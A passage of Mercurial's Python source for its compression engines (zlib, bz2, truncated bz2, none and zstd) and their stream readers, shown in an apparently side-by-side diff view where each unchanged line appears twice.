3286 def forbundletype(self, bundletype):
3286 def forbundletype(self, bundletype):
3287 """Obtain a compression engine registered to a bundle type.
3287 """Obtain a compression engine registered to a bundle type.
3288
3288
3289 Will raise KeyError if the bundle type isn't registered.
3289 Will raise KeyError if the bundle type isn't registered.
3290
3290
3291 Will abort if the engine is known but not available.
3291 Will abort if the engine is known but not available.
3292 """
3292 """
3293 engine = self._engines[self._bundletypes[bundletype]]
3293 engine = self._engines[self._bundletypes[bundletype]]
3294 if not engine.available():
3294 if not engine.available():
3295 raise error.Abort(_('compression engine %s could not be loaded') %
3295 raise error.Abort(_('compression engine %s could not be loaded') %
3296 engine.name())
3296 engine.name())
3297 return engine
3297 return engine
3298
3298
3299 def supportedwireengines(self, role, onlyavailable=True):
3299 def supportedwireengines(self, role, onlyavailable=True):
3300 """Obtain compression engines that support the wire protocol.
3300 """Obtain compression engines that support the wire protocol.
3301
3301
3302 Returns a list of engines in prioritized order, most desired first.
3302 Returns a list of engines in prioritized order, most desired first.
3303
3303
3304 If ``onlyavailable`` is set, filter out engines that can't be
3304 If ``onlyavailable`` is set, filter out engines that can't be
3305 loaded.
3305 loaded.
3306 """
3306 """
3307 assert role in (SERVERROLE, CLIENTROLE)
3307 assert role in (SERVERROLE, CLIENTROLE)
3308
3308
3309 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3309 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3310
3310
3311 engines = [self._engines[e] for e in self._wiretypes.values()]
3311 engines = [self._engines[e] for e in self._wiretypes.values()]
3312 if onlyavailable:
3312 if onlyavailable:
3313 engines = [e for e in engines if e.available()]
3313 engines = [e for e in engines if e.available()]
3314
3314
3315 def getkey(e):
3315 def getkey(e):
3316 # Sort first by priority, highest first. In case of tie, sort
3316 # Sort first by priority, highest first. In case of tie, sort
3317 # alphabetically. This is arbitrary, but ensures output is
3317 # alphabetically. This is arbitrary, but ensures output is
3318 # stable.
3318 # stable.
3319 w = e.wireprotosupport()
3319 w = e.wireprotosupport()
3320 return -1 * getattr(w, attr), w.name
3320 return -1 * getattr(w, attr), w.name
3321
3321
3322 return list(sorted(engines, key=getkey))
3322 return list(sorted(engines, key=getkey))
3323
3323
3324 def forwiretype(self, wiretype):
3324 def forwiretype(self, wiretype):
3325 engine = self._engines[self._wiretypes[wiretype]]
3325 engine = self._engines[self._wiretypes[wiretype]]
3326 if not engine.available():
3326 if not engine.available():
3327 raise error.Abort(_('compression engine %s could not be loaded') %
3327 raise error.Abort(_('compression engine %s could not be loaded') %
3328 engine.name())
3328 engine.name())
3329 return engine
3329 return engine
3330
3330
3331 def forrevlogheader(self, header):
3331 def forrevlogheader(self, header):
3332 """Obtain a compression engine registered to a revlog header.
3332 """Obtain a compression engine registered to a revlog header.
3333
3333
3334 Will raise KeyError if the revlog header value isn't registered.
3334 Will raise KeyError if the revlog header value isn't registered.
3335 """
3335 """
3336 return self._engines[self._revlogheaders[header]]
3336 return self._engines[self._revlogheaders[header]]
3337
3337
3338 compengines = compressormanager()
3338 compengines = compressormanager()
3339
3339
3340 class compressionengine(object):
3340 class compressionengine(object):
3341 """Base class for compression engines.
3341 """Base class for compression engines.
3342
3342
3343 Compression engines must implement the interface defined by this class.
3343 Compression engines must implement the interface defined by this class.
3344 """
3344 """
3345 def name(self):
3345 def name(self):
3346 """Returns the name of the compression engine.
3346 """Returns the name of the compression engine.
3347
3347
3348 This is the key the engine is registered under.
3348 This is the key the engine is registered under.
3349
3349
3350 This method must be implemented.
3350 This method must be implemented.
3351 """
3351 """
3352 raise NotImplementedError()
3352 raise NotImplementedError()
3353
3353
3354 def available(self):
3354 def available(self):
3355 """Whether the compression engine is available.
3355 """Whether the compression engine is available.
3356
3356
3357 The intent of this method is to allow optional compression engines
3357 The intent of this method is to allow optional compression engines
3358 that may not be available in all installations (such as engines relying
3358 that may not be available in all installations (such as engines relying
3359 on C extensions that may not be present).
3359 on C extensions that may not be present).
3360 """
3360 """
3361 return True
3361 return True
3362
3362
3363 def bundletype(self):
3363 def bundletype(self):
3364 """Describes bundle identifiers for this engine.
3364 """Describes bundle identifiers for this engine.
3365
3365
3366 If this compression engine isn't supported for bundles, returns None.
3366 If this compression engine isn't supported for bundles, returns None.
3367
3367
3368 If this engine can be used for bundles, returns a 2-tuple of strings of
3368 If this engine can be used for bundles, returns a 2-tuple of strings of
3369 the user-facing "bundle spec" compression name and an internal
3369 the user-facing "bundle spec" compression name and an internal
3370 identifier used to denote the compression format within bundles. To
3370 identifier used to denote the compression format within bundles. To
3371 exclude the name from external usage, set the first element to ``None``.
3371 exclude the name from external usage, set the first element to ``None``.
3372
3372
3373 If bundle compression is supported, the class must also implement
3373 If bundle compression is supported, the class must also implement
3374 ``compressstream`` and `decompressorreader``.
3374 ``compressstream`` and `decompressorreader``.
3375
3375
3376 The docstring of this method is used in the help system to tell users
3376 The docstring of this method is used in the help system to tell users
3377 about this engine.
3377 about this engine.
3378 """
3378 """
3379 return None
3379 return None
3380
3380
3381 def wireprotosupport(self):
3381 def wireprotosupport(self):
3382 """Declare support for this compression format on the wire protocol.
3382 """Declare support for this compression format on the wire protocol.
3383
3383
3384 If this compression engine isn't supported for compressing wire
3384 If this compression engine isn't supported for compressing wire
3385 protocol payloads, returns None.
3385 protocol payloads, returns None.
3386
3386
3387 Otherwise, returns ``compenginewireprotosupport`` with the following
3387 Otherwise, returns ``compenginewireprotosupport`` with the following
3388 fields:
3388 fields:
3389
3389
3390 * String format identifier
3390 * String format identifier
3391 * Integer priority for the server
3391 * Integer priority for the server
3392 * Integer priority for the client
3392 * Integer priority for the client
3393
3393
3394 The integer priorities are used to order the advertisement of format
3394 The integer priorities are used to order the advertisement of format
3395 support by server and client. The highest integer is advertised
3395 support by server and client. The highest integer is advertised
3396 first. Integers with non-positive values aren't advertised.
3396 first. Integers with non-positive values aren't advertised.
3397
3397
3398 The priority values are somewhat arbitrary and only used for default
3398 The priority values are somewhat arbitrary and only used for default
3399 ordering. The relative order can be changed via config options.
3399 ordering. The relative order can be changed via config options.
3400
3400
3401 If wire protocol compression is supported, the class must also implement
3401 If wire protocol compression is supported, the class must also implement
3402 ``compressstream`` and ``decompressorreader``.
3402 ``compressstream`` and ``decompressorreader``.
3403 """
3403 """
3404 return None
3404 return None
3405
3405
3406 def revlogheader(self):
3406 def revlogheader(self):
3407 """Header added to revlog chunks that identifies this engine.
3407 """Header added to revlog chunks that identifies this engine.
3408
3408
3409 If this engine can be used to compress revlogs, this method should
3409 If this engine can be used to compress revlogs, this method should
3410 return the bytes used to identify chunks compressed with this engine.
3410 return the bytes used to identify chunks compressed with this engine.
3411 Else, the method should return ``None`` to indicate it does not
3411 Else, the method should return ``None`` to indicate it does not
3412 participate in revlog compression.
3412 participate in revlog compression.
3413 """
3413 """
3414 return None
3414 return None
3415
3415
3416 def compressstream(self, it, opts=None):
3416 def compressstream(self, it, opts=None):
3417 """Compress an iterator of chunks.
3417 """Compress an iterator of chunks.
3418
3418
3419 The method receives an iterator (ideally a generator) of chunks of
3419 The method receives an iterator (ideally a generator) of chunks of
3420 bytes to be compressed. It returns an iterator (ideally a generator)
3420 bytes to be compressed. It returns an iterator (ideally a generator)
3421 of bytes of chunks representing the compressed output.
3421 of bytes of chunks representing the compressed output.
3422
3422
3423 Optionally accepts an argument defining how to perform compression.
3423 Optionally accepts an argument defining how to perform compression.
3424 Each engine treats this argument differently.
3424 Each engine treats this argument differently.
3425 """
3425 """
3426 raise NotImplementedError()
3426 raise NotImplementedError()
3427
3427
3428 def decompressorreader(self, fh):
3428 def decompressorreader(self, fh):
3429 """Perform decompression on a file object.
3429 """Perform decompression on a file object.
3430
3430
3431 Argument is an object with a ``read(size)`` method that returns
3431 Argument is an object with a ``read(size)`` method that returns
3432 compressed data. Return value is an object with a ``read(size)`` that
3432 compressed data. Return value is an object with a ``read(size)`` that
3433 returns uncompressed data.
3433 returns uncompressed data.
3434 """
3434 """
3435 raise NotImplementedError()
3435 raise NotImplementedError()
3436
3436
3437 def revlogcompressor(self, opts=None):
3437 def revlogcompressor(self, opts=None):
3438 """Obtain an object that can be used to compress revlog entries.
3438 """Obtain an object that can be used to compress revlog entries.
3439
3439
3440 The object has a ``compress(data)`` method that compresses binary
3440 The object has a ``compress(data)`` method that compresses binary
3441 data. This method returns compressed binary data or ``None`` if
3441 data. This method returns compressed binary data or ``None`` if
3442 the data could not be compressed (too small, not compressible, etc).
3442 the data could not be compressed (too small, not compressible, etc).
3443 The returned data should have a header uniquely identifying this
3443 The returned data should have a header uniquely identifying this
3444 compression format so decompression can be routed to this engine.
3444 compression format so decompression can be routed to this engine.
3445 This header should be identified by the ``revlogheader()`` return
3445 This header should be identified by the ``revlogheader()`` return
3446 value.
3446 value.
3447
3447
3448 The object has a ``decompress(data)`` method that decompresses
3448 The object has a ``decompress(data)`` method that decompresses
3449 data. The method will only be called if ``data`` begins with
3449 data. The method will only be called if ``data`` begins with
3450 ``revlogheader()``. The method should return the raw, uncompressed
3450 ``revlogheader()``. The method should return the raw, uncompressed
3451 data or raise a ``RevlogError``.
3451 data or raise a ``RevlogError``.
3452
3452
3453 The object is reusable but is not thread safe.
3453 The object is reusable but is not thread safe.
3454 """
3454 """
3455 raise NotImplementedError()
3455 raise NotImplementedError()
3456
3456
3457 class _CompressedStreamReader(object):
3457 class _CompressedStreamReader(object):
3458 def __init__(self, fh):
3458 def __init__(self, fh):
3459 if safehasattr(fh, 'unbufferedread'):
3459 if safehasattr(fh, 'unbufferedread'):
3460 self._reader = fh.unbufferedread
3460 self._reader = fh.unbufferedread
3461 else:
3461 else:
3462 self._reader = fh.read
3462 self._reader = fh.read
3463 self._pending = []
3463 self._pending = []
3464 self._pos = 0
3464 self._pos = 0
3465 self._eof = False
3465 self._eof = False
3466
3466
3467 def _decompress(self, chunk):
3467 def _decompress(self, chunk):
3468 raise NotImplementedError()
3468 raise NotImplementedError()
3469
3469
3470 def read(self, l):
3470 def read(self, l):
3471 buf = []
3471 buf = []
3472 while True:
3472 while True:
3473 while self._pending:
3473 while self._pending:
3474 if len(self._pending[0]) > l + self._pos:
3474 if len(self._pending[0]) > l + self._pos:
3475 newbuf = self._pending[0]
3475 newbuf = self._pending[0]
3476 buf.append(newbuf[self._pos:self._pos + l])
3476 buf.append(newbuf[self._pos:self._pos + l])
3477 self._pos += l
3477 self._pos += l
3478 return ''.join(buf)
3478 return ''.join(buf)
3479
3479
3480 newbuf = self._pending.pop(0)
3480 newbuf = self._pending.pop(0)
3481 if self._pos:
3481 if self._pos:
3482 buf.append(newbuf[self._pos:])
3482 buf.append(newbuf[self._pos:])
3483 l -= len(newbuf) - self._pos
3483 l -= len(newbuf) - self._pos
3484 else:
3484 else:
3485 buf.append(newbuf)
3485 buf.append(newbuf)
3486 l -= len(newbuf)
3486 l -= len(newbuf)
3487 self._pos = 0
3487 self._pos = 0
3488
3488
3489 if self._eof:
3489 if self._eof:
3490 return ''.join(buf)
3490 return ''.join(buf)
3491 chunk = self._reader(65536)
3491 chunk = self._reader(65536)
3492 self._decompress(chunk)
3492 self._decompress(chunk)
3493 if not chunk and not self._pending and not self._eof:
3493 if not chunk and not self._pending and not self._eof:
3494 # No progress and no new data, bail out
3494 # No progress and no new data, bail out
3495 return ''.join(buf)
3495 return ''.join(buf)
3496
3496
3497 class _GzipCompressedStreamReader(_CompressedStreamReader):
3497 class _GzipCompressedStreamReader(_CompressedStreamReader):
3498 def __init__(self, fh):
3498 def __init__(self, fh):
3499 super(_GzipCompressedStreamReader, self).__init__(fh)
3499 super(_GzipCompressedStreamReader, self).__init__(fh)
3500 self._decompobj = zlib.decompressobj()
3500 self._decompobj = zlib.decompressobj()
3501 def _decompress(self, chunk):
3501 def _decompress(self, chunk):
3502 newbuf = self._decompobj.decompress(chunk)
3502 newbuf = self._decompobj.decompress(chunk)
3503 if newbuf:
3503 if newbuf:
3504 self._pending.append(newbuf)
3504 self._pending.append(newbuf)
3505 d = self._decompobj.copy()
3505 d = self._decompobj.copy()
3506 try:
3506 try:
3507 d.decompress('x')
3507 d.decompress('x')
3508 d.flush()
3508 d.flush()
3509 if d.unused_data == 'x':
3509 if d.unused_data == 'x':
3510 self._eof = True
3510 self._eof = True
3511 except zlib.error:
3511 except zlib.error:
3512 pass
3512 pass
3513
3513
3514 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3514 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3515 def __init__(self, fh):
3515 def __init__(self, fh):
3516 super(_BZ2CompressedStreamReader, self).__init__(fh)
3516 super(_BZ2CompressedStreamReader, self).__init__(fh)
3517 self._decompobj = bz2.BZ2Decompressor()
3517 self._decompobj = bz2.BZ2Decompressor()
3518 def _decompress(self, chunk):
3518 def _decompress(self, chunk):
3519 newbuf = self._decompobj.decompress(chunk)
3519 newbuf = self._decompobj.decompress(chunk)
3520 if newbuf:
3520 if newbuf:
3521 self._pending.append(newbuf)
3521 self._pending.append(newbuf)
3522 try:
3522 try:
3523 while True:
3523 while True:
3524 newbuf = self._decompobj.decompress('')
3524 newbuf = self._decompobj.decompress('')
3525 if newbuf:
3525 if newbuf:
3526 self._pending.append(newbuf)
3526 self._pending.append(newbuf)
3527 else:
3527 else:
3528 break
3528 break
3529 except EOFError:
3529 except EOFError:
3530 self._eof = True
3530 self._eof = True
3531
3531
3532 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3532 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3533 def __init__(self, fh):
3533 def __init__(self, fh):
3534 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3534 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3535 newbuf = self._decompobj.decompress('BZ')
3535 newbuf = self._decompobj.decompress('BZ')
3536 if newbuf:
3536 if newbuf:
3537 self._pending.append(newbuf)
3537 self._pending.append(newbuf)
3538
3538
3539 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3539 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3540 def __init__(self, fh, zstd):
3540 def __init__(self, fh, zstd):
3541 super(_ZstdCompressedStreamReader, self).__init__(fh)
3541 super(_ZstdCompressedStreamReader, self).__init__(fh)
3542 self._zstd = zstd
3542 self._zstd = zstd
3543 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3543 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3544 def _decompress(self, chunk):
3544 def _decompress(self, chunk):
3545 newbuf = self._decompobj.decompress(chunk)
3545 newbuf = self._decompobj.decompress(chunk)
3546 if newbuf:
3546 if newbuf:
3547 self._pending.append(newbuf)
3547 self._pending.append(newbuf)
3548 try:
3548 try:
3549 while True:
3549 while True:
3550 newbuf = self._decompobj.decompress('')
3550 newbuf = self._decompobj.decompress('')
3551 if newbuf:
3551 if newbuf:
3552 self._pending.append(newbuf)
3552 self._pending.append(newbuf)
3553 else:
3553 else:
3554 break
3554 break
3555 except self._zstd.ZstdError:
3555 except self._zstd.ZstdError:
3556 self._eof = True
3556 self._eof = True
3557
3557
3558 class _zlibengine(compressionengine):
3558 class _zlibengine(compressionengine):
3559 def name(self):
3559 def name(self):
3560 return 'zlib'
3560 return 'zlib'
3561
3561
3562 def bundletype(self):
3562 def bundletype(self):
3563 """zlib compression using the DEFLATE algorithm.
3563 """zlib compression using the DEFLATE algorithm.
3564
3564
3565 All Mercurial clients should support this format. The compression
3565 All Mercurial clients should support this format. The compression
3566 algorithm strikes a reasonable balance between compression ratio
3566 algorithm strikes a reasonable balance between compression ratio
3567 and size.
3567 and size.
3568 """
3568 """
3569 return 'gzip', 'GZ'
3569 return 'gzip', 'GZ'
3570
3570
3571 def wireprotosupport(self):
3571 def wireprotosupport(self):
3572 return compewireprotosupport('zlib', 20, 20)
3572 return compewireprotosupport('zlib', 20, 20)
3573
3573
3574 def revlogheader(self):
3574 def revlogheader(self):
3575 return 'x'
3575 return 'x'
3576
3576
3577 def compressstream(self, it, opts=None):
3577 def compressstream(self, it, opts=None):
3578 opts = opts or {}
3578 opts = opts or {}
3579
3579
3580 z = zlib.compressobj(opts.get('level', -1))
3580 z = zlib.compressobj(opts.get('level', -1))
3581 for chunk in it:
3581 for chunk in it:
3582 data = z.compress(chunk)
3582 data = z.compress(chunk)
3583 # Not all calls to compress emit data. It is cheaper to inspect
3583 # Not all calls to compress emit data. It is cheaper to inspect
3584 # here than to feed empty chunks through generator.
3584 # here than to feed empty chunks through generator.
3585 if data:
3585 if data:
3586 yield data
3586 yield data
3587
3587
3588 yield z.flush()
3588 yield z.flush()
3589
3589
3590 def decompressorreader(self, fh):
3590 def decompressorreader(self, fh):
3591 return _GzipCompressedStreamReader(fh)
3591 return _GzipCompressedStreamReader(fh)
3592
3592
3593 class zlibrevlogcompressor(object):
3593 class zlibrevlogcompressor(object):
3594 def compress(self, data):
3594 def compress(self, data):
3595 insize = len(data)
3595 insize = len(data)
3596 # Caller handles empty input case.
3596 # Caller handles empty input case.
3597 assert insize > 0
3597 assert insize > 0
3598
3598
3599 if insize < 44:
3599 if insize < 44:
3600 return None
3600 return None
3601
3601
3602 elif insize <= 1000000:
3602 elif insize <= 1000000:
3603 compressed = zlib.compress(data)
3603 compressed = zlib.compress(data)
3604 if len(compressed) < insize:
3604 if len(compressed) < insize:
3605 return compressed
3605 return compressed
3606 return None
3606 return None
3607
3607
3608 # zlib makes an internal copy of the input buffer, doubling
3608 # zlib makes an internal copy of the input buffer, doubling
3609 # memory usage for large inputs. So do streaming compression
3609 # memory usage for large inputs. So do streaming compression
3610 # on large inputs.
3610 # on large inputs.
3611 else:
3611 else:
3612 z = zlib.compressobj()
3612 z = zlib.compressobj()
3613 parts = []
3613 parts = []
3614 pos = 0
3614 pos = 0
3615 while pos < insize:
3615 while pos < insize:
3616 pos2 = pos + 2**20
3616 pos2 = pos + 2**20
3617 parts.append(z.compress(data[pos:pos2]))
3617 parts.append(z.compress(data[pos:pos2]))
3618 pos = pos2
3618 pos = pos2
3619 parts.append(z.flush())
3619 parts.append(z.flush())
3620
3620
3621 if sum(map(len, parts)) < insize:
3621 if sum(map(len, parts)) < insize:
3622 return ''.join(parts)
3622 return ''.join(parts)
3623 return None
3623 return None
3624
3624
3625 def decompress(self, data):
3625 def decompress(self, data):
3626 try:
3626 try:
3627 return zlib.decompress(data)
3627 return zlib.decompress(data)
3628 except zlib.error as e:
3628 except zlib.error as e:
3629 raise error.RevlogError(_('revlog decompress error: %s') %
3629 raise error.RevlogError(_('revlog decompress error: %s') %
3630 stringutil.forcebytestr(e))
3630 stringutil.forcebytestr(e))
3631
3631
3632 def revlogcompressor(self, opts=None):
3632 def revlogcompressor(self, opts=None):
3633 return self.zlibrevlogcompressor()
3633 return self.zlibrevlogcompressor()
3634
3634
3635 compengines.register(_zlibengine())
3635 compengines.register(_zlibengine())
3636
3636
3637 class _bz2engine(compressionengine):
3637 class _bz2engine(compressionengine):
3638 def name(self):
3638 def name(self):
3639 return 'bz2'
3639 return 'bz2'
3640
3640
3641 def bundletype(self):
3641 def bundletype(self):
3642 """An algorithm that produces smaller bundles than ``gzip``.
3642 """An algorithm that produces smaller bundles than ``gzip``.
3643
3643
3644 All Mercurial clients should support this format.
3644 All Mercurial clients should support this format.
3645
3645
3646 This engine will likely produce smaller bundles than ``gzip`` but
3646 This engine will likely produce smaller bundles than ``gzip`` but
3647 will be significantly slower, both during compression and
3647 will be significantly slower, both during compression and
3648 decompression.
3648 decompression.
3649
3649
3650 If available, the ``zstd`` engine can yield similar or better
3650 If available, the ``zstd`` engine can yield similar or better
3651 compression at much higher speeds.
3651 compression at much higher speeds.
3652 """
3652 """
3653 return 'bzip2', 'BZ'
3653 return 'bzip2', 'BZ'
3654
3654
3655 # We declare a protocol name but don't advertise by default because
3655 # We declare a protocol name but don't advertise by default because
3656 # it is slow.
3656 # it is slow.
3657 def wireprotosupport(self):
3657 def wireprotosupport(self):
3658 return compewireprotosupport('bzip2', 0, 0)
3658 return compewireprotosupport('bzip2', 0, 0)
3659
3659
3660 def compressstream(self, it, opts=None):
3660 def compressstream(self, it, opts=None):
3661 opts = opts or {}
3661 opts = opts or {}
3662 z = bz2.BZ2Compressor(opts.get('level', 9))
3662 z = bz2.BZ2Compressor(opts.get('level', 9))
3663 for chunk in it:
3663 for chunk in it:
3664 data = z.compress(chunk)
3664 data = z.compress(chunk)
3665 if data:
3665 if data:
3666 yield data
3666 yield data
3667
3667
3668 yield z.flush()
3668 yield z.flush()
3669
3669
3670 def decompressorreader(self, fh):
3670 def decompressorreader(self, fh):
3671 return _BZ2CompressedStreamReader(fh)
3671 return _BZ2CompressedStreamReader(fh)
3672
3672
3673 compengines.register(_bz2engine())
3673 compengines.register(_bz2engine())
3674
3674
3675 class _truncatedbz2engine(compressionengine):
3675 class _truncatedbz2engine(compressionengine):
3676 def name(self):
3676 def name(self):
3677 return 'bz2truncated'
3677 return 'bz2truncated'
3678
3678
3679 def bundletype(self):
3679 def bundletype(self):
3680 return None, '_truncatedBZ'
3680 return None, '_truncatedBZ'
3681
3681
3682 # We don't implement compressstream because it is hackily handled elsewhere.
3682 # We don't implement compressstream because it is hackily handled elsewhere.
3683
3683
3684 def decompressorreader(self, fh):
3684 def decompressorreader(self, fh):
3685 return _TruncatedBZ2CompressedStreamReader(fh)
3685 return _TruncatedBZ2CompressedStreamReader(fh)
3686
3686
3687 compengines.register(_truncatedbz2engine())
3687 compengines.register(_truncatedbz2engine())
3688
3688
3689 class _noopengine(compressionengine):
3689 class _noopengine(compressionengine):
3690 def name(self):
3690 def name(self):
3691 return 'none'
3691 return 'none'
3692
3692
3693 def bundletype(self):
3693 def bundletype(self):
3694 """No compression is performed.
3694 """No compression is performed.
3695
3695
3696 Use this compression engine to explicitly disable compression.
3696 Use this compression engine to explicitly disable compression.
3697 """
3697 """
3698 return 'none', 'UN'
3698 return 'none', 'UN'
3699
3699
3700 # Clients always support uncompressed payloads. Servers don't because
3700 # Clients always support uncompressed payloads. Servers don't because
3701 # unless you are on a fast network, uncompressed payloads can easily
3701 # unless you are on a fast network, uncompressed payloads can easily
3702 # saturate your network pipe.
3702 # saturate your network pipe.
3703 def wireprotosupport(self):
3703 def wireprotosupport(self):
3704 return compewireprotosupport('none', 0, 10)
3704 return compewireprotosupport('none', 0, 10)
3705
3705
3706 # We don't implement revlogheader because it is handled specially
3706 # We don't implement revlogheader because it is handled specially
3707 # in the revlog class.
3707 # in the revlog class.
3708
3708
3709 def compressstream(self, it, opts=None):
3709 def compressstream(self, it, opts=None):
3710 return it
3710 return it
3711
3711
3712 def decompressorreader(self, fh):
3712 def decompressorreader(self, fh):
3713 return fh
3713 return fh
3714
3714
3715 class nooprevlogcompressor(object):
3715 class nooprevlogcompressor(object):
3716 def compress(self, data):
3716 def compress(self, data):
3717 return None
3717 return None
3718
3718
3719 def revlogcompressor(self, opts=None):
3719 def revlogcompressor(self, opts=None):
3720 return self.nooprevlogcompressor()
3720 return self.nooprevlogcompressor()
3721
3721
3722 compengines.register(_noopengine())
3722 compengines.register(_noopengine())
3723
3723
3724 class _zstdengine(compressionengine):
3724 class _zstdengine(compressionengine):
3725 def name(self):
3725 def name(self):
3726 return 'zstd'
3726 return 'zstd'
3727
3727
3728 @propertycache
3728 @propertycache
3729 def _module(self):
3729 def _module(self):
3730 # Not all installs have the zstd module available. So defer importing
3730 # Not all installs have the zstd module available. So defer importing
3731 # until first access.
3731 # until first access.
3732 try:
3732 try:
3733 from . import zstd
3733 from . import zstd
3734 # Force delayed import.
3734 # Force delayed import.
3735 zstd.__version__
3735 zstd.__version__
3736 return zstd
3736 return zstd
3737 except ImportError:
3737 except ImportError:
3738 return None
3738 return None
3739
3739
3740 def available(self):
3740 def available(self):
3741 return bool(self._module)
3741 return bool(self._module)
3742
3742
3743 def bundletype(self):
3743 def bundletype(self):
3744 """A modern compression algorithm that is fast and highly flexible.
3744 """A modern compression algorithm that is fast and highly flexible.
3745
3745
3746 Only supported by Mercurial 4.1 and newer clients.
3746 Only supported by Mercurial 4.1 and newer clients.
3747
3747
3748 With the default settings, zstd compression is both faster and yields
3748 With the default settings, zstd compression is both faster and yields
3749 better compression than ``gzip``. It also frequently yields better
3749 better compression than ``gzip``. It also frequently yields better
3750 compression than ``bzip2`` while operating at much higher speeds.
3750 compression than ``bzip2`` while operating at much higher speeds.
3751
3751
3752 If this engine is available and backwards compatibility is not a
3752 If this engine is available and backwards compatibility is not a
3753 concern, it is likely the best available engine.
3753 concern, it is likely the best available engine.
3754 """
3754 """
3755 return 'zstd', 'ZS'
3755 return 'zstd', 'ZS'
3756
3756
3757 def wireprotosupport(self):
3757 def wireprotosupport(self):
3758 return compewireprotosupport('zstd', 50, 50)
3758 return compewireprotosupport('zstd', 50, 50)
3759
3759
3760 def revlogheader(self):
3760 def revlogheader(self):
3761 return '\x28'
3761 return '\x28'
3762
3762
3763 def compressstream(self, it, opts=None):
3763 def compressstream(self, it, opts=None):
3764 opts = opts or {}
3764 opts = opts or {}
3765 # zstd level 3 is almost always significantly faster than zlib
3765 # zstd level 3 is almost always significantly faster than zlib
3766 # while providing no worse compression. It strikes a good balance
3766 # while providing no worse compression. It strikes a good balance
3767 # between speed and compression.
3767 # between speed and compression.
3768 level = opts.get('level', 3)
3768 level = opts.get('level', 3)
3769
3769
3770 zstd = self._module
3770 zstd = self._module
3771 z = zstd.ZstdCompressor(level=level).compressobj()
3771 z = zstd.ZstdCompressor(level=level).compressobj()
3772 for chunk in it:
3772 for chunk in it:
3773 data = z.compress(chunk)
3773 data = z.compress(chunk)
3774 if data:
3774 if data:
3775 yield data
3775 yield data
3776
3776
3777 yield z.flush()
3777 yield z.flush()
3778
3778
3779 def decompressorreader(self, fh):
3779 def decompressorreader(self, fh):
3780 return _ZstdCompressedStreamReader(fh, self._module)
3780 return _ZstdCompressedStreamReader(fh, self._module)
3781
3781
3782 class zstdrevlogcompressor(object):
3782 class zstdrevlogcompressor(object):
3783 def __init__(self, zstd, level=3):
3783 def __init__(self, zstd, level=3):
3784 # TODO consider omitting frame magic to save 4 bytes.
3784 # TODO consider omitting frame magic to save 4 bytes.
3785 # This writes content sizes into the frame header. That is
3785 # This writes content sizes into the frame header. That is
3786 # extra storage. But it allows a correct size memory allocation
3786 # extra storage. But it allows a correct size memory allocation
3787 # to hold the result.
3787 # to hold the result.
3788 self._cctx = zstd.ZstdCompressor(level=level)
3788 self._cctx = zstd.ZstdCompressor(level=level)
3789 self._dctx = zstd.ZstdDecompressor()
3789 self._dctx = zstd.ZstdDecompressor()
3790 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3790 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3791 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3791 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3792
3792
3793 def compress(self, data):
3793 def compress(self, data):
3794 insize = len(data)
3794 insize = len(data)
3795 # Caller handles empty input case.
3795 # Caller handles empty input case.
3796 assert insize > 0
3796 assert insize > 0
3797
3797
3798 if insize < 50:
3798 if insize < 50:
3799 return None
3799 return None
3800
3800
3801 elif insize <= 1000000:
3801 elif insize <= 1000000:
3802 compressed = self._cctx.compress(data)
3802 compressed = self._cctx.compress(data)
3803 if len(compressed) < insize:
3803 if len(compressed) < insize:
3804 return compressed
3804 return compressed
3805 return None
3805 return None
3806 else:
3806 else:
3807 z = self._cctx.compressobj()
3807 z = self._cctx.compressobj()
3808 chunks = []
3808 chunks = []
3809 pos = 0
3809 pos = 0
3810 while pos < insize:
3810 while pos < insize:
3811 pos2 = pos + self._compinsize
3811 pos2 = pos + self._compinsize
3812 chunk = z.compress(data[pos:pos2])
3812 chunk = z.compress(data[pos:pos2])
3813 if chunk:
3813 if chunk:
3814 chunks.append(chunk)
3814 chunks.append(chunk)
3815 pos = pos2
3815 pos = pos2
3816 chunks.append(z.flush())
3816 chunks.append(z.flush())
3817
3817
3818 if sum(map(len, chunks)) < insize:
3818 if sum(map(len, chunks)) < insize:
3819 return ''.join(chunks)
3819 return ''.join(chunks)
3820 return None
3820 return None
3821
3821
3822 def decompress(self, data):
3822 def decompress(self, data):
3823 insize = len(data)
3823 insize = len(data)
3824
3824
3825 try:
3825 try:
3826 # This was measured to be faster than other streaming
3826 # This was measured to be faster than other streaming
3827 # decompressors.
3827 # decompressors.
3828 dobj = self._dctx.decompressobj()
3828 dobj = self._dctx.decompressobj()
3829 chunks = []
3829 chunks = []
3830 pos = 0
3830 pos = 0
3831 while pos < insize:
3831 while pos < insize:
3832 pos2 = pos + self._decompinsize
3832 pos2 = pos + self._decompinsize
3833 chunk = dobj.decompress(data[pos:pos2])
3833 chunk = dobj.decompress(data[pos:pos2])
3834 if chunk:
3834 if chunk:
3835 chunks.append(chunk)
3835 chunks.append(chunk)
3836 pos = pos2
3836 pos = pos2
3837 # Frame should be exhausted, so no finish() API.
3837 # Frame should be exhausted, so no finish() API.
3838
3838
3839 return ''.join(chunks)
3839 return ''.join(chunks)
3840 except Exception as e:
3840 except Exception as e:
3841 raise error.RevlogError(_('revlog decompress error: %s') %
3841 raise error.RevlogError(_('revlog decompress error: %s') %
3842 stringutil.forcebytestr(e))
3842 stringutil.forcebytestr(e))
3843
3843
3844 def revlogcompressor(self, opts=None):
3844 def revlogcompressor(self, opts=None):
3845 opts = opts or {}
3845 opts = opts or {}
3846 return self.zstdrevlogcompressor(self._module,
3846 return self.zstdrevlogcompressor(self._module,
3847 level=opts.get('level', 3))
3847 level=opts.get('level', 3))
3848
3848
3849 compengines.register(_zstdengine())
3849 compengines.register(_zstdengine())
3850
3850
3851 def bundlecompressiontopics():
3851 def bundlecompressiontopics():
